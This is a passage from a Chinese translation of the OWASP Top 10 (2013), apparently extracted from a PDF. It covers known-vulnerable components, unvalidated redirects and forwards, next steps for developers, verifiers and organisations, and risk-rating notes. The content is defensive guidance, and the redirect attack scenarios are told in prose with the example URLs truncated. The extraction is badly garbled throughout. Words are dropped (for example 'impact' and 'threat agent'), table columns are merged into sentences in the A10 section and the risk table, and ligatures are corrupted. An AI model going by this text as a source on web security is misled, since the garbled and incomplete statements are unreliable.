者 可 以 使 用 的 方 法 来 防 止 CSRF 漏 洞 3. 要 求 用 户 重 新 认 证 或 者 判 明 他 们 是 一 个 真 实 的 用 户 ( 例 如 通 过 CAPTCHA ) 也 可 以 防 护 CSRF 攻 击 参 考 资 料 OWASP OWASP CSRF ArPcle OWASP CSRF PrevenPon Cheat Sheet OWASP CSRFGuard - CSRF Defense Tool ESAPI Project Home Page ESAPI HTTPUPliPes Class with AnPCSRF Tokens OWASP TesPng Guide: Chapter on CSRF TesPng OWASP CSRFTester - CSRF TesPng Tool 其 他 CWE Entry 352 on CSRF

15 A9 使 用 含 有 已 知 漏 洞 的 组 件 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 一 些 含 有 漏 洞 的 组 件 ( 如 : 框 架 库 ) 可 以 被 自 动 化 工 具 发 现 和 利 用 这 使 得 部 分 引 入 了 混 乱 的 角 色, 而 不 仅 仅 是 攻 击 者 了 平 均 攻 击 者 通 过 扫 描 或 手 动 分 析 识 别 问 题 组 件, 然 后 根 据 需 要 定 制 攻 击 代 码 并 实 施 攻 击 在 应 用 中 使 用 组 件 越 深 入, 实 施 攻 击 的 难 度 越 大 广 泛 难 中 等 事 实 上, 大 多 数 的 应 用 都 存 在 这 些 问 题 可 能 是 由 低 到 高 全 因 为 大 多 数 的 开 发 团 队 并 不 会 把 及 时 更 新 组 件 / 库 作 为 他 们 的 工 作 重 心 在 很 多 情 况 下, 开 发 者 都 不 了 解 他 们 所 使 用 的 全 部 组 件, 更 不 用 说 组 件 的 版 本 了 组 件 的 依 赖 性 使 情 况 更 加 糟 糕 系 列 的 漏 洞, 包 括 注 入, 破 损 的 访 问 控 制,XSS 等 受 范 围 也 从 最 低 的 受 损 到 主 机 被 完 全 接 管 和 数 据 的 泄 漏 应 用 / 描 述 考 虑 一 下 受 的 应 用 中, 每 个 脆 弱 点 对 控 制 来 说 意 味 着 什 么 可 能 是 非 常 细 微 的, 也 有 可 能 意 味 着 被 完 全 攻 破 我 存 在 含 有 已 知 漏 洞 组 件 的 漏 洞? 理 论 上, 应 该 是 很 容 易 确 定 您 当 前 是 否 在 使 用 含 有 漏 洞 的 组 件 或 者 库 不 幸 的 是, 商 业 或 开 源 软 件 的 漏 洞 报 告 并 不 能 以 标 准 的 可 查 找 的 方 式 指 定 受 组 件 的 确 切 版 本 信 息 更 有 甚 者, 并 不 是 所 有 的 库 都 使 用 易 于 理 解 的 版 本 编 号 系 统 最 糟 糕 的 是, 不 是 所 有 的 漏 洞 都 报 告 给 一 个 方 便 查 询 的 漏 洞 中 心, 尽 管, 像 CVE 或 NVD 这 样 的 网 站 正 变 得 更 易 于 搜 索 判 断 您 是 否 易 于 受 到 这 类 攻 击, 要 求 您 不 但 要 不 停 地 搜 索 这 些 数 据 库, 还 要 关 注 大 量 的 邮 件 列 表 和 可 能 包 含 漏 洞 发 布 的 公 告 信 息 如 果 您 使 用 的 组 件 之 一 存 在 漏 洞, 您 应 该 仔 细 评 估 该 漏 洞 是 否 给 您 的 也 带 来 了 缺 陷 此 评 估 可 以 通 过 检 查 您 的 代 码 使 用 该 组 件 的 部 分, 以 及 该 缺 陷 可 能 导 致 的 您 关 心 的 结 果 来 完 成 攻 击 案 例 组 件 中 含 有 漏 洞 可 以 导 致 几 乎 所 有 可 能 存 在 的 风 险 从 微 不 足 道 的 问 题, 到 精 心 设 计 的 用 于 攻 击 特 定 组 织 的 恶 意 软 件 大 多 数 组 件 在 应 用 程 序 中 一 直 以 最 高 权 限 运 行, 所 以 任 意 组 件 里 的 漏 洞 都 是 非 常 严 重 的 下 面 的 两 个 含 有 漏 洞 的 组 件 在 2011 年 被 下 载 了 2200 万 次 Apache CXF 认 证 绕 过 未 能 提 供 身 份 令 牌 的 情 况 下, 攻 击 者 可 以 以 最 高 权 限 调 用 任 意 的 web 服 务 (Apache CXF 是 一 个 服 务 框 架, 不 要 与 Apache 应 用 服 务 器 混 淆 ) Spring 远 程 代 码 执 行 滥 用 Spring 中 语 言 表 达 式 的 实 现 允 许 攻 击 者 执 行 任 意 代 码, 有 效 的 接 管 服 务 器 每 个 使 用 上 述 两 个 任 意 一 个 库 的 应 用 程 序, 都 是 易 于 受 到 攻 击 的 因 为 两 个 组 件 都 会 被 应 用 用 户 直 接 访 问 其 他 的 漏 洞 库, 在 应 用 程 序 中 使 用 的 越 深 入, 可 能 越 难 被 利 用 我 如 何 防 止? 一 个 选 择 是 停 止 使 用 非 自 己 开 发 的 组 件, 不 过 这 并 不 现 实 另 一 个 选 择, 使 用 最 新 版 本 的 组 件 大 多 数 组 件 项 目 并 不 为 其 老 版 本 提 供 漏 洞 补 丁 相 反, 它 们 仅 仅 在 下 个 版 本 中 修 正 此 问 题 所 以 升 级 到 新 版 本 是 很 重 要 的 软 件 项 目 应 该 有 如 下 的 流 程 : 1. 标 识 您 正 在 使 用 的 所 有 组 件 及 其 版 本, 包 括 所 有 的 组 件 ( 比 如 版 本 插 件 ) 2. 在 公 共 数 据 库, 项 目 邮 件 列 表 和 安 全 邮 件 列 表 中 时 刻 关 注 这 些 组 件 的 安 全 信 息 并 保 证 它 们 是 最 新 的 3. 建 立 组 件 使 用 的 安 全 策 略, 比 如 需 要 某 些 软 件 开 发 实 践, 通 过 安 全 性 测 试 和 可 接 受 的 授 权 许 可 4. 在 适 当 的 情 况 下, 考 虑 增 加 对 组 件 的 安 全 封 装, 去 掉 不 使 用 的 功 能 和 / 或 安 全 薄 弱 的 或 者 组 件 易 受 攻 击 的 方 面 参 考 资 料 OWASP Good Component PracPces Project 其 他 The Unfortunate Reality of Insecure Libraries Open Source SoTware Security Addressing Security Concerns in Open Source Components MITRE Common VulnerabiliPes and Exposures Example Mass Assignment Vulnerability that was fixed in AcPveRecord, a Ruby on Rails GEM

16 A10 未 验 证 的 重 定 向 和 转 发 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 平 均 少 见 易 中 等 应 用 / 描 述 考 虑 所 有 能 诱 使 你 的 用 户 向 你 的 网 站 递 交 请 求 的 人 你 的 用 户 使 用 的 任 何 网 站 或 其 他 HTML 源 (feed) 都 可 以 这 样 做 攻 击 者 链 接 到 未 验 证 的 重 定 向 并 诱 使 受 害 者 去 点 击 由 于 是 链 接 到 有 效 的 网 站, 受 害 者 很 有 可 能 去 点 击 攻 击 者 利 用 不 安 全 的 转 发 绕 过 安 全 检 测 应 用 程 序 经 常 将 用 户 重 定 向 到 其 他 网 页, 这 种 重 定 向 可 能 试 或 以 类 似 的 方 式 进 行 内 部 转 发 有 时, 图 安 装 恶 意 软 件 或 目 标 网 页 是 通 过 一 个 未 经 验 证 的 参 数 来 者 诱 使 受 害 者 泄 露 指 定 的, 这 就 允 许 攻 击 者 选 择 目 标 页 面 密 码 或 其 他 敏 感 信 息 不 安 全 的 转 发 检 测 未 经 验 证 的 重 定 向 很 容 易, 只 需 寻 可 能 允 许 绕 过 访 问 找 那 些 允 许 你 指 定 整 个 URL 的 重 定 向 控 制 但 检 测 未 经 验 证 的 转 发 困 难 些, 因 为 它 们 的 目 标 是 内 部 网 页 考 虑 到 维 护 用 户 信 任 的 商 业 价 值 如 果 用 户 被 恶 意 软 件 占 领 了 怎 么 办? 如 果 攻 击 者 能 够 访 问 只 限 于 内 部 使 用 的 功 能 怎 么 办? 我 易 受 攻 击 吗? 验 证 应 用 程 序 是 否 有 未 验 证 的 重 定 向 或 转 发 的 最 好 的 方 法 是 : 1. 审 查 所 有 使 用 重 定 向 或 转 发 ( 在.NET 中 称 为 转 移 ) 的 代 码 每 一 次 使 用, 都 应 该 验 证 目 标 URL 是 否 被 包 含 在 任 何 参 数 值 中 如 果 是, 且 目 标 URL 并 不 在 经 过 验 证 的 白 名 单 中, 那 么 就 是 存 在 漏 洞 的 2. 此 外, 抓 取 网 站 内 容 查 看 是 否 能 产 生 重 定 向 (HTTP 响 应 代 码 从 300 到 307, 通 常 是 302) 检 查 重 定 向 之 前 提 供 的 参 数 是 否 是 目 标 URL 或 其 一 部 分 如 果 是 的 话, 更 改 URL 的 目 的 地, 并 观 察 网 站 是 否 重 定 向 到 新 的 目 标 3. 如 果 没 有 代 码, 检 查 所 有 的 参 数 以 辨 别 它 们 是 否 看 起 来 像 一 个 重 定 向 或 转 发 目 的 地 网 址 的 一 部 分, 对 那 些 看 起 来 像 的 参 数 进 行 测 试 攻 击 案 例 案 例 #1: 应 用 程 序 有 一 个 名 为 redirect.jsp 的 页 面, 该 页 面 有 一 个 参 数 名 是 url 攻 击 者 精 心 制 作 一 个 恶 意 URL 将 用 户 重 定 向 到 一 个 恶 意 网 站, 执 行 钓 鱼 攻 击 并 安 装 恶 意 程 序 h\p:// 案 例 #2: 应 用 程 序 使 用 转 发 在 网 站 的 不 同 部 分 之 间 发 送 请 求 为 了 帮 助 实 现 这 一 功 能, 如 果 一 个 交 易 成 功 了 的 话, 一 些 网 页 就 会 发 送 一 个 参 数 给 用 户, 用 于 指 定 用 户 的 下 一 个 页 面 在 这 种 情 况 下, 攻 击 者 制 作 一 个 URL, 用 于 绕 过 应 用 程 序 的 访 问 控 制 检 查, 并 将 他 转 发 给 一 个 他 通 常 不 能 访 问 的 管 理 功 能 h\p:// 我 如 何 防 止? 重 定 向 和 转 发 的 安 全 使 用 可 以 有 多 种 方 式 完 成 : 1. 避 免 使 用 重 定 向 和 转 发 2. 如 果 使 用 了 重 定 向 和 转 发, 则 不 要 在 计 算 目 标 时 涉 及 到 用 户 参 数 这 通 常 容 易 做 到 3. 如 果 使 用 目 标 参 数 无 法 避 免, 应 确 保 其 所 提 供 的 值 对 于 当 前 用 户 是 有 效 的, 并 已 经 授 权 参 考 资 料 OWASP OWASP ArPcle on Open Redirects ESAPI SecurityWrapperResponse sendredirect() method 其 他 建 议 把 这 种 目 标 的 参 数 做 成 一 个 映 射 值, 而 不 是 真 的 URL 或 其 中 的 一 部 分, 然 后 由 服 务 器 端 代 码 将 映 射 值 转 换 成 目 标 URL 应 用 程 序 可 以 使 用 ESAPI 重 写 sendredirect() 方 法 来 确 保 所 有 重 定 向 的 目 的 地 是 安 全 的 避 免 这 种 漏 洞 是 非 常 重 要 的, 因 为 钓 鱼 软 件 为 了 获 取 用 户 信 任, 往 往 最 喜 欢 攻 击 这 种 漏 洞 CWE Entry 601 on Open Redirects WASC ArPcle on URL Redirector Abuse Google blog arpcle on the dangers of open redirects OWASP Top 10 for.net arpcle on Unvalidated Redirects and Forwards

17 +D 开 发 人 员 下 一 步 做 什 么? 建 立 并 使 用 可 重 复 使 用 的 安 全 流 程 和 标 准 安 全 控 制 无 论 您 是 刚 接 触 web 应 用 程 序 安 全 还 是 已 经 非 常 熟 悉 各 种 风 险, 创 建 一 个 安 全 的 web 应 用 程 序 或 修 复 一 个 已 存 在 的 应 用 程 序 的 任 务 都 可 能 很 困 难 如 果 您 需 要 管 理 一 个 大 型 的 应 用 程 序 组 合, 那 任 务 将 是 十 分 艰 巨 的 为 了 帮 助 企 业 组 织 和 开 发 人 员 以 最 低 成 本 降 低 应 用 程 序 的 安 全 风 险,OWASP 制 作 了 许 多 免 费 和 开 源 的 资 源 您 可 以 使 用 这 些 资 源 来 解 决 您 企 业 组 织 的 应 用 程 序 安 全 问 题 以 下 内 容 是 OWASP 提 供 的 为 帮 助 企 业 组 织 创 建 安 全 的 web 应 用 程 序 的 一 些 资 源 在 下 一 页 中, 我 们 将 展 示 其 他 可 以 帮 助 企 业 组 织 验 证 web 应 用 程 序 安 全 性 的 OWASP 资 源 应 用 程 序 安 全 需 求 为 了 创 建 一 个 安 全 的 web 应 用 程 序, 您 必 须 定 义 安 全 对 该 应 用 程 序 的 意 义 OWASP 建 议 您 使 用 OWASP 应 用 程 序 安 全 验 证 标 准 (ASVS), 作 为 指 导, 帮 助 您 设 置 您 的 应 用 程 序 的 安 全 需 求 如 果 您 的 应 用 程 序 是 外 包 的, 您 需 要 考 虑 使 用 OWASP 安 全 软 件 合 同 附 件 应 用 程 序 安 全 架 构 与 其 改 造 应 用 程 序 的 安 全, 不 如 在 应 用 程 序 开 发 的 初 始 阶 段 进 行 安 全 设 计, 更 能 节 约 成 本 OWASP 推 荐 OWASP 开 发 者 指 南 和 OWASP 防 护 最 佳 实 践, 这 是 很 好 的 起 点, 用 于 指 导 如 何 在 应 用 程 序 开 发 的 初 始 阶 段 进 行 安 全 设 计 标 准 的 安 全 控 制 建 立 强 大 并 有 用 的 安 全 控 制 极 度 困 难 给 开 发 人 员 提 供 一 套 标 准 的 安 全 控 制 会 极 大 简 化 应 用 程 序 的 安 全 开 发 过 程 OWASP 推 荐 OWASP 企 业 安 全 API(ESAPI) 项 目 作 为 安 全 API 的 模 型, 用 于 创 建 安 全 的 web 应 用 程 序 ESAPI 提 供 多 种 语 言 的 参 考 实 现, 包 括 Java,.NET,PHP, Classic ASP,Python 和 Cold Fusion 安 全 的 开 发 周 期 为 了 改 进 企 业 遵 循 的 应 用 程 序 开 发 流 程,OWASP 推 荐 使 用 OWASP 软 件 保 证 成 熟 模 型 (SAMM) 该 模 型 能 帮 助 企 业 组 织 制 定 并 实 施 根 据 企 业 面 临 的 特 定 风 险 而 定 制 的 软 件 安 全 战 略 应 用 程 序 安 全 教 育 OWASP 教 育 项 目 为 培 训 开 发 人 员 的 web 应 用 程 序 安 全 知 识 提 供 了 培 训 材 料, 并 编 制 了 大 量 OWASP 教 育 演 示 材 料 如 果 需 要 实 际 操 作 了 解 漏 洞, 可 以 使 用 OWASP WebGoat, WebGoat.NET, 或 者 OWASP Broken Web ApplicaPon 项 目 如 果 想 了 解 最 新 资 讯, 请 参 加 OWASP AppSec 大 会, OWASP 会 议 培 训, 或 者 本 地 的 OWASP 分 部 会 议 还 有 许 多 其 他 的 OWASP 资 源 可 供 使 用 OWASP 项 目 网 页 列 明 了 所 有 的 OWASP 项 目, 并 根 据 发 布 的 版 本 情 况 进 行 编 排 ( 发 布 质 量 Beta 版 和 Alpha 版 ) 大 多 数 OWASP 资 源 都 可 以 在 我 们 的 wiki 上 查 看 到, 同 时 可 以 订 购 各 种 OWASP 纸 质 文 档 或 电 子 书

18 +V 验 证 人 员 下 一 步 做 什 么? 组 织 起 来 为 了 验 证 您 所 开 发 或 打 算 购 买 的 web 应 用 程 序 的 安 全 性,OWASP 建 议 您 ( 如 果 可 能 的 话 ) 对 应 用 程 序 进 行 代 码 审 查, 并 测 试 该 应 用 程 序 同 时,OWASP 还 建 议 尽 可 能 使 用 安 全 代 码 审 查 和 应 用 程 序 渗 透 测 试 相 结 合 的 方 法 因 为 这 两 种 技 术 是 相 辅 相 成 的, 这 样 才 能 结 合 两 种 技 术 的 优 势 而 使 用 工 具 协 助 验 证 过 程 能 提 高 专 业 分 析 的 效 率 和 有 效 性 OWASP 的 评 估 工 具 致 力 于 帮 助 专 业 人 员 更 有 效 地 工 作, 而 不 是 试 图 将 分 析 过 程 本 身 自 动 化 将 验 证 web 应 用 程 序 安 全 性 的 方 法 标 准 化 : 为 了 帮 助 企 业 组 织 建 立 一 个 具 有 一 致 性 和 特 定 严 格 等 级 的 过 程, 用 于 评 估 web 应 用 程 序 安 全,OWASP 创 建 了 OWASP 应 用 程 序 安 全 验 证 标 准 (ASVS) 该 文 档 为 执 行 web 应 用 程 序 安 全 评 估 定 义 了 最 低 的 验 证 标 准 OWASP 建 议 您 在 验 证 web 应 用 程 序 的 安 全 时 使 用 ASVS 作 为 指 导, 了 解 如 何 执 行 安 全 验 证, 哪 些 技 术 最 适 合 使 用, 并 利 用 它 定 义 并 选 择 严 格 的 等 级 OWASP 也 建 议 您 使 用 使 用 ASVS 作 为 指 导, 来 帮 助 您 定 义 和 选 择 从 第 三 方 提 供 商 处 购 买 的 web 应 用 程 序 评 估 服 务 评 估 工 具 套 件 :OWASP Live CD 项 目 将 许 多 最 好 的 开 源 安 全 工 具 融 合 到 一 个 单 一 的 可 启 动 的 环 境 中 Web 开 发 人 员 测 试 人 员 和 安 全 专 家 能 直 接 启 动 该 Live CD 并 能 马 上 使 用 到 一 个 完 整 的 安 全 测 试 套 件 不 需 要 安 装 或 配 置 即 可 使 用 该 CD 中 所 提 供 的 工 具 代 码 审 查 安 全 代 码 审 查 特 别 适 合 验 证 应 用 程 序 是 否 含 有 强 大 的 安 全 机 制, 并 且 该 应 用 程 序 通 过 检 查 很 难 发 现 应 用 程 序 在 输 出 上 的 安 全 问 题 测 试 特 别 适 合 证 明 该 缺 陷 可 以 被 利 用 这 就 是 说, 这 两 个 方 法 是 互 补 的, 而 事 实 上 在 某 些 领 域 重 叠 审 查 代 码 : 和 OWASP 开 发 指 南 和 OWASP 测 试 指 南 一 起,OWASP 还 制 作 了 OWASP 代 码 审 查 指 南, 用 于 帮 助 开 发 人 员 和 应 用 程 序 安 全 专 家 了 解 如 何 快 速 有 效 地 通 过 代 码 审 查 来 检 测 web 应 用 程 序 的 安 全 性 很 多 web 应 用 程 序 的 安 全 问 题 通 过 代 码 审 查 比 外 部 测 试 更 容 易 被 发 现, 例 如 : 注 入 漏 洞 代 码 审 查 工 具 :OWASP 已 经 制 作 了 一 些 很 有 前 景 的 工 具 帮 助 专 业 人 员 执 行 代 码 分 析, 但 这 些 工 具 仍 然 处 在 不 成 熟 的 阶 段 这 些 工 具 的 开 发 者 每 天 使 用 这 些 工 具 实 行 安 全 代 码 审 查, 但 是 非 专 业 人 员 可 能 会 觉 得 这 些 工 具 很 难 使 用 这 些 代 码 审 核 工 具 包 括 CodeCrawler, Orizon 和 O2 只 有 O2 一 直 以 来 在 积 极 的 开 发 中, 最 后 一 个 版 本 在 2010 年 发 布, 并 排 进 前 10 名 安 全 和 渗 透 测 试 测 试 应 用 程 序 :OWASP 制 作 了 OWASP 测 试 指 南 用 于 帮 助 开 发 人 员 测 试 人 员 和 应 用 程 序 安 全 专 家 了 解 如 何 有 效 并 快 速 地 测 试 web 应 用 程 序 的 安 全 性 这 个 庞 大 的 指 南 是 许 多 人 不 懈 努 力 的 成 果 该 指 南 广 泛 的 覆 盖 了 web 应 用 程 序 安 全 测 试 的 许 多 方 面 就 像 代 码 审 查 具 有 它 的 优 点 一 样, 安 全 测 试 也 有 自 己 的 优 点 如 果 您 能 通 过 展 示 一 个 可 实 现 的 攻 击 来 证 明 应 用 程 序 是 不 安 全 的, 那 么 将 非 常 具 有 说 服 力 而 且 许 多 安 全 问 题 是 无 法 通 过 代 码 审 查 找 到 的, 尤 其 是 所 有 应 用 程 序 架 构 提 供 的 安 全 性 能, 因 为 应 用 程 序 本 身 没 有 提 供 这 些 安 全 性 能 应 用 程 序 渗 透 测 试 工 具 :WebScarab 是 OWASP 项 目 中 最 为 广 泛 使 用 的 一 个 工 具, 新 的 工 具 叫 ZAP, 目 前 更 加 流 行 的 工 具, 这 两 款 工 具 都 是 web 应 用 程 序 的 测 试 代 理 工 具 这 些 工 具 允 许 安 全 分 析 人 员 和 开 发 人 员 拦 截 web 应 用 程 序 的 请 求, 从 而 使 安 全 分 析 人 员 能 够 了 解 该 应 用 程 序 是 如 何 工 作 的, 进 而 允 许 安 全 分 析 人 员 提 交 测 试 请 求 用 于 检 测 应 用 程 序 是 否 对 该 请 求 进 行 安 全 响 应 这 个 工 具 在 协 助 分 析 人 员 确 认 XSS 漏 洞 身 份 认 证 漏 洞 和 访 问 控 制 漏 洞 时 特 别 有 效 ZAP 还 内 置 了 一 个 主 动 扫 描 工 具, 更 重 要 是 这 些 都 是 免 费 的! 还 有 一 些 其 他 的 免 费 开 源 资 源 和 代 码 审 查 工 具 目 前 最 好 是 FindBugs, 而 它 侧 重 安 全 的 插 件 叫 FindSecurityBugs, 两 者 都 是 用 Java 开 发 的

19 +O 企 业 组 织 的 下 一 步 做 什 么? 现 在 就 启 动 您 的 应 用 程 序 安 全 计 划 应 用 程 序 安 全 已 经 不 再 是 一 个 选 择 了 在 日 益 增 长 的 攻 击 和 监 管 的 压 力 下, 企 业 组 织 必 须 建 立 一 个 有 效 的 能 力 去 确 保 应 用 程 序 的 安 全 由 于 已 经 在 生 产 环 境 中 的 应 用 程 序 和 代 码 行 数 量 惊 人, 许 多 企 业 组 织 都 得 努 力 处 理 数 量 巨 大 的 漏 洞 OWASP 推 荐 这 些 企 业 组 织 建 立 一 个 应 用 程 序 安 全 计 划, 深 入 了 解 并 改 善 它 们 的 应 用 程 序 组 合 的 安 全 性 为 了 获 得 应 用 程 序 的 安 全 性, 需 要 不 同 企 业 组 织 中 的 多 个 部 门 之 间 协 同 工 作, 这 包 括 了 安 全 和 审 计 软 件 开 发 和 商 业 与 执 行 管 理 它 要 求 提 供 安 全 的 可 见 度, 让 所 有 不 同 角 色 的 人 都 可 以 看 到 并 理 解 企 业 组 织 的 应 用 程 序 的 安 全 态 势 它 还 要 求 将 重 点 集 中 在 能 以 最 低 成 本 有 效 减 少 风 险 的 实 际 活 动 和 成 果 上, 以 提 高 整 个 企 业 组 织 的 安 全 性 一 个 有 效 的 应 用 程 序 安 全 计 划 中 的 一 些 关 键 活 动 包 括 : 开 始 阶 段 建 立 一 个 应 用 程 序 安 全 计 划 并 被 采 纳 进 行 能 力 差 距 分 析 以 比 较 您 的 组 织 和 您 的 同 行, 从 而 定 义 关 键 有 待 改 善 的 领 域 和 一 个 执 行 计 划 得 到 管 理 层 的 批 准, 并 建 立 一 个 针 对 企 业 的 整 个 IT 组 织 的 应 用 程 序 安 全 宣 传 活 动 基 于 风 险 的 组 合 方 法 从 固 有 风 险 的 角 度 来 确 定 并 对 您 的 应 用 程 序 组 合 进 行 优 先 排 序 建 立 一 个 应 用 程 序 的 风 险 特 征 分 析 模 型 来 衡 量 和 优 先 考 虑 您 的 应 用 程 序 组 合 建 立 保 证 准 则, 合 理 定 义 需 要 的 覆 盖 范 围 和 严 格 水 平 建 立 一 个 通 用 的 风 险 等 级 模 型, 该 模 型 应 该 包 含 一 组 一 致 的 可 能 性 和 因 素, 来 反 应 您 的 企 业 组 织 的 风 险 承 受 能 力 建 立 强 大 的 基 础 建 立 一 组 集 中 关 注 的 策 略 和 标 准, 用 于 提 供 所 有 开 发 团 队 所 遵 循 的 一 个 应 用 程 序 安 全 底 线 定 义 一 组 通 用 的 可 重 复 使 用 的 安 全 控 制, 用 于 补 充 这 些 政 策 和 标 准, 并 提 供 使 用 它 们 的 设 计 和 开 发 指 南 建 立 一 个 应 用 程 序 安 全 培 训 课 程, 此 课 程 应 该 要 求 所 有 的 开 发 人 员 参 加, 并 且 针 对 不 同 的 开 发 责 任 和 话 题 进 行 修 改 将 安 全 整 合 入 现 有 流 程 定 义 并 集 成 安 全 实 施 和 核 查 活 动 到 现 有 的 开 发 与 操 作 流 程 之 中 这 些 活 动 包 括 了 威 胁 建 模, 安 全 设 计 和 审 查, 安 全 编 码 和 代 码 审 查, 渗 透 测 试, 修 复 等 等 为 开 发 和 项 目 团 队 提 供 主 题 专 家 和 支 持 服 务, 以 保 证 他 们 的 工 作 顺 利 进 行 提 高 安 全 在 管 理 层 的 可 见 度 通 过 度 量 进 行 管 理 根 据 对 获 取 的 度 量 和 分 析 数 据 决 定 改 进 和 投 资 的 方 向 这 些 度 量 包 括 : 遵 循 安 全 实 践 / 活 动, 引 入 的 漏 洞, 修 复 的 漏 洞, 应 用 程 序 覆 盖 的 范 围 等 等 对 实 现 和 核 查 活 动 进 行 数 据 分 析, 寻 找 根 本 原 因 和 漏 洞 模 式, 以 推 动 整 个 企 业 的 战 略 和 系 统 改 进

20 +R 关 于 风 险 的 备 注 说 明 这 里 讲 述 的 是 风 险, 而 不 是 漏 洞 虽 然 2007 年 和 之 前 更 老 版 本 的 OWASP Top 10 专 注 于 查 找 最 常 见 的 漏 洞, 但 是 OWASP TOP 10 仍 然 一 直 围 绕 着 风 险 而 组 织 这 使 得 一 些 试 图 寻 找 一 个 严 格 的 漏 洞 分 类 结 构 的 人 产 生 了 一 些 理 解 上 的 混 乱 2010 年 的 OWASP Top 10 项 目 首 次 明 确 了 10 大 风 险, 十 分 明 确 地 描 述 了 攻 击 向 量 漏 洞 技 术 风 险, 和 风 险 这 些 因 素 如 何 结 合 在 一 起 产 生 风 险, 这 个 版 本 的 OWASP TOP 10 仍 然 采 用 相 同 的 方 法 论 Top 10 的 风 险 评 级 方 法 是 基 于 OWASP 风 险 评 级 方 法 对 于 Top 10 中 每 一 项, 我 们 通 过 查 看 每 个 常 见 漏 洞 一 般 情 况 下 的 可 能 性 因 素 和 因 素, 评 估 了 每 个 漏 洞 对 于 典 型 的 Web 应 用 程 序 造 成 的 典 型 风 险, 然 后 根 据 漏 洞 给 应 用 程 序 带 来 的 风 险 程 度 的 不 同 来 对 Top 10 进 行 分 级 OWASP 风 险 评 级 方 法 定 义 了 许 多 用 于 计 算 漏 洞 风 险 等 级 的 因 素 但 是,Top 10 应 该 讨 论, 而 不 是 在 真 实 的 应 用 程 序 中 讨 论 具 体 的 漏 洞 的 风 险 因 此, 我 们 无 法 像 系 统 拥 有 者 那 样 精 确 计 算 应 用 程 序 中 的 风 险 高 低 我 们 也 不 知 道 您 的 应 用 程 序 和 数 据 有 多 重 要 您 的 是 什 么 或 是 您 的 系 统 是 如 何 架 构 和 如 何 操 作 的 对 于 每 一 个 漏 洞, 我 们 的 方 法 包 含 三 种 可 能 性 因 素 ( 和 ) 和 一 个 因 素 ( 技 术 ) 漏 洞 的 我 们 通 常 无 需 计 算 许 多 不 同 的 组 织 一 直 在 提 供 的 数 据 给 我 们 ( 请 参 考 第 3 页 致 谢 中 的 内 容 ) 我 们 取 了 这 些 数 据 的 平 均 数 得 到 了 根 据 排 序 的 10 种 最 可 能 存 在 的 漏 洞 然 后 将 这 些 数 据 和 其 他 两 个 可 能 性 因 素 结 合 ( 和 ), 用 于 计 算 每 个 漏 洞 的 可 能 性 等 级 然 后 用 每 个 漏 洞 的 可 能 性 等 级 乘 以 我 们 估 计 的 每 个 漏 洞 的 平 均 技 术, 从 而 得 到 了 Top 10 列 表 中 每 一 项 的 总 的 风 险 等 级 值 得 注 意 的 是 这 个 方 法 既 没 有 考 虑 的 可 能 性, 也 没 有 考 虑 任 何 与 您 的 特 定 应 用 程 序 相 关 的 技 术 细 节 这 些 因 素 都 可 以 极 大 攻 击 者 发 现 和 利 用 某 个 漏 洞 的 整 个 可 能 性 这 个 等 级 同 样 没 有 将 对 您 的 的 实 际 考 虑 进 去 您 的 企 业 组 织 需 要 自 己 确 定 企 业 组 织 可 以 承 受 的 应 用 安 全 风 险 有 多 大 OWASP Top 10 的 目 的 并 不 是 替 您 做 这 一 风 险 分 析 下 面 举 例 说 明 A3: 跨 站 脚 本 的 风 险 计 算 方 法 注 意 到 XSS 的 风 险 非 常 普 遍, 以 致 于 它 被 唯 一 赋 予 了 非 常 广 泛 的 值 其 他 所 有 风 险 值 的 范 围 从 广 泛 到 少 见 ( 值 从 1 到 3) 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 平 均 非 常 广 泛 易 中 等 应 用 / 描 述 * 2 2

21 +F 关 于 风 险 因 素 的 详 细 说 明 Top 10 风 险 因 素 总 结 下 面 的 表 格 总 结 了 2013 年 版 Top 10 应 用 程 序 安 全 风 险 因 素, 以 及 我 们 赋 予 每 个 风 险 因 素 的 风 险 值 这 些 因 素 基 于 OWASP 团 队 拥 有 的 统 计 数 据 和 经 验 而 决 定 为 了 了 解 某 个 特 定 的 应 用 程 序 或 者 企 业 组 织 的 风 险, 您 必 须 考 虑 您 自 己 的 威 胁 代 理 和 如 果 没 有 相 应 位 置 上 的 去 执 行 必 要 的 攻 击, 或 者 产 生 的 微 不 足 道, 那 么 就 是 再 臭 名 昭 著 的 软 件 漏 洞 也 不 会 导 致 一 个 严 重 的 安 全 风 险 风 险 攻 击 向 量 安 全 漏 洞 技 术 A1- 注 入 应 用 描 述 易 常 见 平 均 严 重 应 用 描 述 A2- 失 效 的 身 份 认 证 和 会 话 管 理 A3- 跨 站 脚 本 (XSS) A4- 不 安 全 的 直 接 对 象 引 用 应 用 描 述 平 均 广 泛 平 均 严 重 应 用 描 述 应 用 描 述 平 均 非 常 广 泛 易 中 等 应 用 描 述 应 用 描 述 易 常 见 易 中 等 应 用 描 述 A5- 安 全 配 置 错 误 应 用 描 述 易 常 见 易 中 等 应 用 描 述 A6- 敏 感 信 息 泄 漏 应 用 描 述 难 少 见 平 均 严 重 应 用 描 述 A7- 功 能 级 访 问 控 制 缺 失 A8- 跨 站 请 求 伪 造 (CSRF) A9- 使 用 已 知 含 有 漏 洞 的 组 件 A10- 未 验 证 的 重 定 向 和 转 发 应 用 描 述 易 常 见 平 均 中 等 应 用 描 述 应 用 描 述 平 均 常 见 易 中 等 应 用 描 述 应 用 描 述 平 均 广 泛 难 中 等 应 用 描 述 应 用 描 述 平 均 少 见 易 中 等 应 用 描 述 额 外 需 要 考 虑 的 风 险 虽 然 Top 10 的 内 容 覆 盖 广 泛, 但 是 在 您 的 企 业 组 织 中 还 有 其 他 的 风 险 需 要 您 考 虑 并 且 评 估 有 的 风 险 出 现 在 了 OWASP Top 10 的 以 前 版 本 中, 而 有 的 则 没 有, 这 包 括 在 不 停 被 发 现 的 新 的 攻 击 技 术 其 他 您 需 要 考 虑 的 重 要 应 用 程 序 安 全 风 险 包 括 以 下 方 面 : Clickjacking 并 发 漏 洞 拒 绝 服 务 (2004 年 版 Top 10 的 A9 部 分 ) 表 达 式 语 言 注 入 (CWE- 917) 信 息 泄 漏 和 不 恰 当 的 错 误 处 理 (2007 年 版 Top 10 的 A6 部 分 ) 抗 自 动 化 不 足 (CWE- 799) 登 陆 机 制 不 足 ( 与 2007 年 版 Top 10 的 A6 部 分 有 关 ) 缺 少 入 侵 检 测 和 响 应 恶 意 文 件 执 行 (2007 年 版 Top 10 的 A3 部 分 ) 质 量 分 配 (CWE- 915) 用 户 隐 私

22